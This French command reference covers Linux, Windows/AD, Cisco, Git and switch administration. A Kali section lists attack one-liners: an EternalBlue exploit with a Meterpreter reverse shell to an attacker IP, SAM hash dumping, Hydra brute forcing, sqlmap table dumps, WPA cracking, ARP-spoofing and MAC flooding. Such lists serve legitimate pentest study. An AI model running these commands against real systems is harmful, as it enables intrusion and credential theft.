Cheatsheets

Référentiel unifié de commandes — recherche en temps réel par type et mot-clé.

Recherche de commandes(365 / 365)

LinuxFichiers & Répertoires
ls -laLister fichiers avec permissions
pwdAfficher répertoire courant
cd /pathChanger de répertoire
mkdir -p dir/subdirCréer répertoires imbriqués
rm -rf dirSupprimer récursivement (force)
cp -r src/ dst/Copier récursivement
mv file newDéplacer ou renommer
cat fileAfficher contenu d'un fichier
less filePaginer le contenu d'un fichier
head -n 20 fileAfficher les 20 premières lignes
tail -f /var/log/syslogSuivre un fichier de log en temps réel
find / -name "*.conf" 2>/dev/nullChercher fichiers par nom
find /home -user usernameTrouver fichiers d'un utilisateur
find / -perm /4000 2>/dev/nullFichiers avec bit SUID
grep -r "pattern" /etc/Recherche récursive de pattern
grep -i "error" /var/log/syslogRecherche insensible à la casse
grep -v "^#" /etc/ssh/sshd_configExclure les lignes commentées
grep -E "192\.168\.[0-9]+\.[0-9]+" log.txtRecherche avec expression régulière étendue
tar -czf archive.tar.gz /dossier/Créer archive gzip
tar -xzf archive.tar.gzExtraire archive gzip
tar -tzf archive.tar.gzLister le contenu d'une archive
awk -F: '{print $1, $6}' /etc/passwdExtraire colonnes (login et home)
sed -i 's/Port 22/Port 2222/' /etc/ssh/sshd_configSubstitution inline dans un fichier
sed -n '10,20p' fichier.txtAfficher lignes 10 à 20
LinuxPermissions & Utilisateurs
chmod 755 script.shPermissions rwxr-xr-x (octal)
chmod 644 fichier.txtPermissions rw-r--r-- (octal)
chmod 600 .ssh/id_rsaPermissions clé privée SSH
chmod u+x fichierAjouter execute au propriétaire
chmod a+x script.shExecute pour tous les utilisateurs
chown user:group fichierChanger propriétaire et groupe
chown -R www-data:www-data /var/www/Changer propriétaire récursivement
useradd -m -s /bin/bash -G sudo usernameCréer utilisateur avec home et sudo
passwd usernameChanger mot de passe utilisateur
usermod -aG docker usernameAjouter utilisateur à un groupe
usermod -L usernameVerrouiller le compte utilisateur
chage -E 2025-12-31 usernameDéfinir date d'expiration du compte
id usernameAfficher UID/GID de l'utilisateur
groups usernameLister les groupes d'un utilisateur
LinuxSystème & Services
systemctl start nginxDémarrer un service
systemctl stop nginxArrêter un service
systemctl restart nginxRedémarrer un service
systemctl reload nginxRecharger la config sans interruption
systemctl enable nginxActiver au démarrage automatique
systemctl status nginxVoir l'état d'un service
journalctl -u nginx -fSuivre les logs d'un service en temps réel
journalctl -u nginx --since "1 hour ago"Logs depuis la dernière heure
journalctl -p errAfficher uniquement les erreurs
apt update && apt upgrade -yMettre à jour les paquets (Debian)
apt install paquetInstaller un paquet
apt remove paquetSupprimer un paquet
apt purge paquetSupprimer paquet et ses configs
apt autoremoveSupprimer les dépendances orphelines
dpkg -l | grep paquetLister les paquets installés
dpkg -i paquet.debInstaller un .deb local
ps auxLister tous les processus
ps aux | grep nginxFiltrer processus par nom
topMoniteur processus interactif
htopMoniteur processus amélioré
kill PIDEnvoyer signal SIGTERM à un processus
kill -9 PIDForcer l'arrêt d'un processus (SIGKILL)
pkill nginxTuer processus par nom
nice -n 10 commandeLancer commande avec priorité basse
crontab -eÉditer les tâches planifiées cron
crontab -lLister les tâches cron
LinuxRéseau Linux
ip addr showAfficher les interfaces réseau
ip link set eth0 upActiver une interface réseau
ip addr add 192.168.1.10/24 dev eth0Assigner une IP à une interface
ip route showAfficher la table de routage
ip route add default via 192.168.1.1Ajouter une route par défaut
ss -tulnPorts TCP/UDP en écoute
ss -tulnpPorts en écoute avec processus associés
ping -c 4 8.8.8.8Test de connectivité ICMP
traceroute 8.8.8.8Tracer la route vers un hôte
curl -I https://example.comAfficher les en-têtes HTTP
wget -q -O /dev/null https://example.comTester une URL en silence
nslookup example.comRésolution DNS simple
dig example.comRésolution DNS détaillée
dig +short example.com ARésolution DNS courte (enregistrement A)
ssh -i ~/.ssh/id_ed25519 user@serveurConnexion SSH avec clé privée
ssh -p 2222 user@serveurConnexion SSH sur port non-standard
ssh-keygen -t ed25519 -C "email@example.com"Générer une paire de clés SSH
ssh-copy-id user@serveurCopier clé publique vers serveur
ssh -L 8080:localhost:80 user@serveurTunnel SSH local (port forwarding)
ssh -R 8080:localhost:80 user@serveurTunnel SSH distant (reverse port forwarding)
scp file user@host:/pathCopier un fichier via SSH
LinuxFirewall Linux
ufw enableActiver le pare-feu UFW
ufw status verboseVoir l'état et les règles UFW
ufw allow 22/tcpAutoriser SSH
ufw allow 80/tcpAutoriser HTTP
ufw allow from 192.168.1.0/24Autoriser tout le sous-réseau LAN
ufw deny 23/tcpBloquer Telnet
ufw delete allow 80/tcpSupprimer une règle UFW
iptables -L -v -nLister les règles iptables
iptables -A INPUT -p tcp --dport 80 -j ACCEPTAutoriser trafic entrant HTTP
iptables -A INPUT -j DROPBloquer tout trafic non explicitement autorisé
iptables-save > /etc/iptables/rules.v4Sauvegarder règles iptables
PowerShellActive Directory
Import-Module ActiveDirectoryImporter le module Active Directory
Get-ADUser -Filter * | Select-Object Name, SamAccountName, EnabledLister tous les utilisateurs AD
Get-ADUser -Identity "username" -Properties *Voir toutes les propriétés d'un utilisateur
New-ADUser -Name "John Doe" -SamAccountName "jdoe" -Enabled $trueCréer un utilisateur AD
Set-ADUser -Identity "jdoe" -Title "Administrateur" -Department "IT"Modifier les propriétés d'un utilisateur
Disable-ADAccount -Identity "jdoe"Désactiver un compte AD
Remove-ADUser -Identity "jdoe"Supprimer un utilisateur AD
Get-ADGroup -Filter *Lister tous les groupes AD
New-ADGroup -Name "GRP_IT" -GroupScope Global -GroupCategory SecurityCréer un groupe de sécurité AD
Add-ADGroupMember -Identity "GRP_IT" -Members "jdoe"Ajouter un utilisateur à un groupe AD
Get-ADGroupMember -Identity "GRP_IT"Lister les membres d'un groupe AD
New-ADOrganizationalUnit -Name "IT" -Path "DC=domain,DC=local"Créer une OU (unité organisationnelle)
Get-ADOrganizationalUnit -Filter *Lister toutes les OUs
PowerShellGPO
Get-GPO -AllLister toutes les GPO
Get-GPOReport -Name "Default Domain Policy" -ReportType HTML -Path "C:\GPO_Report.html"Exporter un rapport GPO en HTML
New-GPO -Name "Politique_Securite_IT"Créer une nouvelle GPO
New-GPLink -Name "Politique_Securite_IT" -Target "OU=IT,DC=domain,DC=local"Lier une GPO à une OU
gpupdate /forceForcer l'application immédiate des GPO
gpresult /RRésultat des GPO appliquées
gpresult /H rapport.htmlRapport GPO en HTML
PowerShellDNS & DHCP Windows
Get-DnsServerZoneLister les zones DNS
Add-DnsServerPrimaryZone -Name "example.com" -ZoneFile "example.com.dns"Créer une zone DNS primaire
Add-DnsServerResourceRecordA -Name "www" -ZoneName "example.com" -IPv4Address "192.168.1.10"Ajouter un enregistrement A
Resolve-DnsName "server01.domain.local"Résoudre un nom DNS
ipconfig /flushdnsVider le cache DNS local
Get-DhcpServerv4ScopeLister les scopes DHCP
Add-DhcpServerv4Scope -Name "LAN" -StartRange 192.168.1.100 -EndRange 192.168.1.200 -SubnetMask 255.255.255.0Créer un scope DHCP
Get-DhcpServerv4Lease -ScopeId 192.168.1.0Voir les baux DHCP actifs
PowerShellSystème Windows
Get-Service | Where-Object Status -eq "Running"Services en cours d'exécution
Start-Service -Name "wuauserv"Démarrer un service Windows
Stop-Service -Name "wuauserv"Arrêter un service Windows
Restart-Service -Name "spooler"Redémarrer un service Windows
Set-Service -Name "wuauserv" -StartupType AutomaticConfigurer le type de démarrage
Get-Process | Sort-Object CPU -Descending | Select-Object -First 5Top 5 processus par CPU
Get-EventLog -LogName System -Newest 5050 derniers événements système
Get-WmiObject Win32_OperatingSystemInformations sur l'OS
Set-ExecutionPolicy RemoteSignedAutoriser scripts PowerShell signés
Get-ChildItem -Recurse -Filter "*.log"Chercher fichiers log récursivement
Get-Process | Export-Csv -Path "processes.csv" -NoTypeInformationExporter processus en CSV
systeminfoInformations système complètes (CMD)
tasklistLister les processus (CMD)
PowerShellRéseau Windows
Get-SmbShareLister les partages réseau
New-SmbShare -Name "Partage_IT" -Path "D:\Partages\IT" -FullAccess "GRP_IT"Créer un partage réseau
Set-SmbShare -Name "Partage_IT" -Description "Partage du service IT"Modifier un partage réseau
ipconfig /allInformations réseau complètes
netstat -anConnexions réseau actives et ports
Test-NetConnection host -Port 80Tester la connectivité TCP
Invoke-Command -ComputerName "PC" -ScriptBlock {Get-Service}Exécution distante PowerShell
net user username /domainInfos utilisateur dans le domaine (CMD)
net group "Domain Admins" /domainMembres du groupe Domain Admins (CMD)
PowerShellHyper-V
Get-VMLister les machines virtuelles Hyper-V
New-VM -Name "Server01" -MemoryStartupBytes 2GB -Generation 2Créer une nouvelle VM
Start-VM -Name "Server01"Démarrer une VM
Stop-VM -Name "Server01"Arrêter une VM
Checkpoint-VM -Name "Server01" -SnapshotName "Avant mise à jour"Créer un snapshot de VM
Cisco IOSNavigation & Affichage
enablePasser en mode privilégié (EXEC)
configure terminalEntrer en mode configuration globale
endRetourner au mode privilégié depuis config
write memorySauvegarder la configuration courante
copy running-config startup-configCopier config active vers startup
show versionVersion IOS et informations hardware
show running-configAfficher la configuration active
show ip interface briefRésumé de toutes les interfaces IP
show ip routeAfficher la table de routage IP
show interfacesStatistiques détaillées des interfaces
show vlan briefRésumé des VLANs configurés
show ip ospf neighborVoisins OSPF détectés
show ip ospf databaseBase de données OSPF (LSDB)
show access-listsAfficher toutes les ACLs
Cisco IOSConfiguration Interface
interface GigabitEthernet0/0Entrer en configuration d'interface
ip address 192.168.1.1 255.255.255.0Configurer l'adresse IP d'une interface
no shutdownActiver l'interface (lever administrativement)
description "LAN Interface"Ajouter une description à l'interface
hostname Router1Définir le nom du routeur/switch
banner motd # Message du jour #Message d'avertissement à la connexion
Cisco IOSVLANs
vlan 10Créer ou accéder au VLAN 10
name VLAN_COMPTANommer un VLAN
switchport mode accessConfigurer un port en mode accès
switchport access vlan 10Assigner un port à un VLAN
switchport mode trunkConfigurer un port en mode trunk
switchport trunk allowed vlan 10,20,30Autoriser VLANs spécifiques sur trunk
Cisco IOSRoutage
ip route 192.168.2.0 255.255.255.0 192.168.1.254Route statique vers un réseau
ip route 0.0.0.0 0.0.0.0 10.0.0.1Route par défaut (passerelle)
router ospf 1Activer le processus OSPF
network 192.168.1.0 0.0.0.255 area 0Annoncer un réseau en OSPF area 0
Cisco IOSNAT & DHCP
access-list 1 permit 192.168.0.0 0.0.255.255ACL standard pour NAT
ip nat inside source list 1 interface Gi0/0 overloadNAT Overload (PAT) vers l'interface WAN
ip nat inside source static 192.168.1.10 203.0.113.5NAT statique (IP privée → IP publique)
ip nat insideMarquer interface comme côté LAN (NAT)
ip nat outsideMarquer interface comme côté WAN (NAT)
ip dhcp pool LAN_POOLCréer un pool DHCP
network 192.168.1.0 255.255.255.0Réseau du pool DHCP
default-router 192.168.1.1Passerelle par défaut DHCP
dns-server 8.8.8.8 1.1.1.1Serveurs DNS pour le pool DHCP
ip dhcp excluded-address 192.168.1.1 192.168.1.20Exclure des adresses du pool DHCP
Cisco IOSSécurité & ACLs
access-list 10 permit 192.168.1.0 0.0.0.255ACL standard — autoriser sous-réseau
access-list 10 deny anyACL standard — tout bloquer
access-list 100 permit tcp 192.168.1.0 0.0.0.255 any eq 80ACL étendue — autoriser HTTP
access-list 100 permit tcp 192.168.1.0 0.0.0.255 any eq 443ACL étendue — autoriser HTTPS
access-list 100 deny ip any anyACL étendue — bloquer tout le reste
ip access-group 100 inAppliquer l'ACL en entrée sur une interface
GitInitialisation
git initInitialiser un dépôt Git local
git clone urlCloner un dépôt distant
git clone url --depth 1Cloner avec historique minimal (shallow)
GitSuivi
git statusVoir l'état des fichiers dans le dépôt
git add .Indexer tous les changements
git add -pIndexer interactivement par hunks
git commit -m "message"Créer un commit
git commit --amendModifier le dernier commit
git diffVoir les changements non indexés
git diff --stagedVoir les changements indexés
git log --oneline --graphHistorique compact avec graphe de branches
git show HEADDétails du dernier commit
GitRemote
git remote -vLister les dépôts distants
git remote add origin urlAjouter un dépôt distant
git push origin mainPousser vers la branche main
git push -u origin featurePousser et définir le remote de suivi
git pullRécupérer et fusionner depuis le remote
git fetch originRécupérer sans fusionner
GitBranches
git branch -aLister toutes les branches (locales et distantes)
git checkout -b featureCréer et basculer sur une nouvelle branche
git switch mainBasculer sur la branche main
git merge featureFusionner une branche dans la branche active
git rebase mainRebaser la branche sur main
git branch -d featureSupprimer une branche locale
GitAvancé
git stashMettre de côté les changements en cours
git stash popRestaurer les changements mis de côté
git reset --hard HEAD~1Annuler le dernier commit (destructif)
git revert HEADAnnuler le dernier commit (non-destructif)
git tag v1.0.0Créer un tag de version
git cherry-pick abc1234Appliquer un commit spécifique
git bisect startDémarrer la recherche binaire de régression
RéseauDiagnostic
ping hostTester la connectivité ICMP
traceroute hostTracer la route vers un hôte
tracepath hostTracer la route avec MTU (sans root)
mtr hostTraceroute interactif en temps réel
netstat -tulnpPorts en écoute avec processus associés
arp -aAfficher la table ARP locale
arp -nTable ARP sans résolution DNS
RéseauDNS
dig domainRésolution DNS complète
dig @8.8.8.8 domainRésolution DNS via serveur spécifique
dig -x 8.8.8.8Résolution DNS inverse (PTR)
nslookup domainRésolution DNS simple
host domainRésolution DNS en ligne de commande
whois domain.comInformations WHOIS d'un domaine
RéseauAnalyse
nmap -sV hostScanner les ports et détecter les versions
nmap -sn 192.168.1.0/24Découverte d'hôtes (ping scan)
tcpdump -i eth0 port 80Capturer le trafic HTTP sur eth0
tcpdump -i eth0 -w capture.pcapEnregistrer une capture réseau
tcpdump -r capture.pcapLire une capture réseau sauvegardée
wiresharkAnalyser le trafic réseau graphiquement
RéseauHTTP
curl -I urlAfficher les en-têtes HTTP d'une URL
curl -X POST -d "data" urlRequête HTTP POST avec données
curl -u user:pass urlRequête HTTP avec authentification
curl -k https://urlIgnorer les erreurs de certificat SSL
wget urlTélécharger un fichier
wget -r -np urlTélécharger récursivement un site
KaliReconnaissance
nmap -sC -sV -oN scan.txt targetScan complet avec scripts NSE et sauvegarde
nmap -sS targetScan SYN furtif (stealth scan)
nmap -p- targetScanner les 65535 ports
nmap -O targetDétecter le système d'exploitation
nmap -A targetScan agressif (OS, version, scripts, traceroute)
nmap --script vuln targetScanner les vulnérabilités connues (NSE)
nmap -sS -sV target -oX scan.xmlExport XML pour import Metasploit
nmap -sS -sV target -oA scan_completExport dans tous les formats simultanément
gobuster dir -u http://target -w list.txtÉnumération de répertoires web
gobuster dns -d target.com -w subdomains.txtÉnumération de sous-domaines DNS
searchsploit keywordRechercher des exploits dans la base locale
theHarvester -d domain.com -b allCollecte OSINT : emails, sous-domaines
nikto -h http://targetAudit de vulnérabilités d'un serveur web
enum4linux -a targetÉnumération SMB/NetBIOS (Windows/Samba)
KaliMetasploit
msfconsoleLancer le framework Metasploit
search ms17-010Rechercher un module par mot-clé ou CVE
use exploit/windows/smb/ms17_010_eternalblueSélectionner un module exploit
show optionsAfficher les paramètres du module actif
show payloadsLister les payloads compatibles
set RHOSTS 10.10.10.1Définir l'adresse de la cible
setg LHOST 10.10.14.1Définir l'IP d'attaquant globalement
set payload windows/x64/meterpreter/reverse_tcpSélectionner un payload Meterpreter
exploitLancer l'attaque
exploit -zLancer et mettre la session en arrière-plan
sessionsLister les sessions actives
sessions -i 2Interagir avec la session n°2
db_nmap -sS -sV 10.10.10.1Scan Nmap depuis msfconsole (résultats en DB)
workspace -a TryHackMeCréer un espace de travail isolé
hostsLister les machines scannées en base
servicesLister les services découverts en base
saveSauvegarder les variables globales Metasploit
KaliMeterpreter
getuidVérifier les privilèges obtenus
psLister les processus sur la cible
migrate PIDMigrer la session vers un autre processus
hashdumpExtraire les hashs SAM (mots de passe)
run post/windows/gather/smart_hashdumpExtraire et sauvegarder les hashs SAM
search -f flag*.txtChercher un fichier sur la cible
backgroundMettre la session en arrière-plan (Ctrl+Z)
KaliExploitation
hydra -l user -P wordlist.txt ssh://targetBrute force SSH avec Hydra
hydra -L users.txt -P pass.txt http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"Brute force formulaire web HTTP
sqlmap -u "http://target?id=1" --dbsDétecter injections SQL et lister BDs
sqlmap -u "http://target?id=1" -D dbname -T users --dumpExtraire une table via injection SQL
KaliWi-Fi
airmon-ng check killTuer les processus interférant avec le Wi-Fi
airmon-ng start wlan0Passer la carte Wi-Fi en mode monitor
airodump-ng wlan0monScanner tous les réseaux Wi-Fi à portée
airodump-ng --bssid <MAC> --channel <CH> -w capture wlan0monCibler un réseau et capturer le handshake WPA
aircrack-ng -b <MAC> -w rockyou.txt capture.capAttaque dictionnaire sur handshake WPA
KaliMitM & Réseau
macof -i eth0Saturer la table MAC du switch (flood)
ettercap -GLancer Ettercap en mode graphique
ettercap -T -q -i eth0 -M arp:remote /VICTIME// /ROUTEUR//ARP spoofing Man-in-the-Middle
tcpdump -i eth0 -w interception.pcapCapturer trafic intercepté vers fichier .pcap
KaliPost-exploitation
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCracker des hashs avec John the Ripper
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCracker hashs NTLM (Windows)
hashcat -m 0 hash.txt wordlist.txtCracker hashs MD5 avec GPU
hashcat -m 1000 hash.txt wordlist.txtCracker hashs NTLM avec GPU
sudo gunzip /usr/share/wordlists/rockyou.txt.gzDécompresser le dictionnaire rockyou
SwitchCisco — VLAN
show vlan briefAfficher la liste des VLANs et leurs ports
vlan 10Créer le VLAN 10 (mode config)
name SERVEURSNommer le VLAN courant
switchport mode accessConfigurer le port en mode accès
switchport access vlan 10Assigner le port au VLAN 10
SwitchCisco — Trunk
show interfaces trunkAfficher les ports trunk et VLANs autorisés
switchport mode trunkConfigurer le port en mode trunk
switchport trunk allowed vlan 10,20,30Limiter les VLANs autorisés sur le trunk
switchport trunk native vlan 99Définir le VLAN natif du trunk
interface range gi0/1-24Sélectionner une plage de ports
channel-group 1 mode activeCréer un EtherChannel LACP
show etherchannel summaryAfficher l'état des EtherChannels
SwitchCisco — STP
show spanning-treeAfficher l'état du Spanning Tree
spanning-tree portfastActiver PortFast (transition immédiate)
spanning-tree bpduguard enableActiver BPDU Guard (protection boucle)
SwitchCisco — Sécurité port
show port-securityAfficher l'état de la sécurité des ports
switchport port-securityActiver la sécurité sur le port
switchport port-security maximum 2Limiter à 2 adresses MAC sur le port
switchport port-security violation shutdownDésactiver le port en cas de violation
switchport port-security mac-address stickyApprendre dynamiquement les MAC autorisées
SwitchCisco — Monitoring
show running-configAfficher la configuration active
show startup-configAfficher la configuration sauvegardée
show mac address-tableAfficher la table d'adresses MAC
show interfaces statusÉtat résumé de tous les ports
SwitchCisco — Sauvegarde config
copy running-config startup-configSauvegarder la config active en NVRAM
copy running-config tftp:Exporter la config vers un serveur TFTP
SwitchHP/Aruba — VLAN
show vlansAfficher tous les VLANs configurés
vlan 10Créer le VLAN 10
vlan 10 untagged 1-24Assigner ports 1-24 au VLAN 10 (access)
vlan 10 tagged 25-26Ajouter VLAN 10 en trunk sur ports 25-26
SwitchHP/Aruba — Trunk & STP
show trunksAfficher les agrégations de liens
trunk 25-26 trk1 lacpCréer un trunk LACP sur ports 25-26
show spanning-treeAfficher l'état du Spanning Tree
spanning-tree 1-24 admin-edge-portActiver edge-port (équiv. PortFast)
SwitchHP/Aruba — Monitoring
show running-configAfficher la configuration active
show interfaces briefÉtat résumé de tous les ports
show mac-addressAfficher la table MAC
SwitchHP/Aruba — Sauvegarde
write memorySauvegarder la configuration
SwitchJuniper — VLAN
show vlansAfficher tous les VLANs configurés
set vlans SERVEURS vlan-id 10Créer le VLAN 10 nommé SERVEURS
set interfaces ge-0/0/1 unit 0 family ethernet-switching vlan members 10Assigner un port au VLAN 10
SwitchJuniper — Trunk & STP
show ethernet-switching tableAfficher la table de commutation MAC
show interfaces terseÉtat résumé de toutes les interfaces
show spanning-tree bridgeAfficher les infos du bridge STP
set protocols rstp interface ge-0/0/1 edgeActiver edge-port RSTP sur un port
SwitchJuniper — Sauvegarde
commitAppliquer les changements de configuration
rollback 1Revenir à la configuration précédente
show configuration | compare rollback 1Comparer config actuelle vs précédente
SwitchExtreme — VLAN
show vlanAfficher tous les VLANs
create vlan SERVEURS tag 10Créer le VLAN 10 nommé SERVEURS
configure vlan SERVEURS add ports 1-24 untaggedAssigner des ports en mode access
configure vlan SERVEURS add ports 25 taggedAjouter un port en mode trunk
SwitchExtreme — Monitoring
show ports informationAfficher l'état de tous les ports
show fdbAfficher la table de forwarding MAC
show stpd detailAfficher les détails du Spanning Tree
SwitchExtreme — Sauvegarde
save configurationSauvegarder la configuration active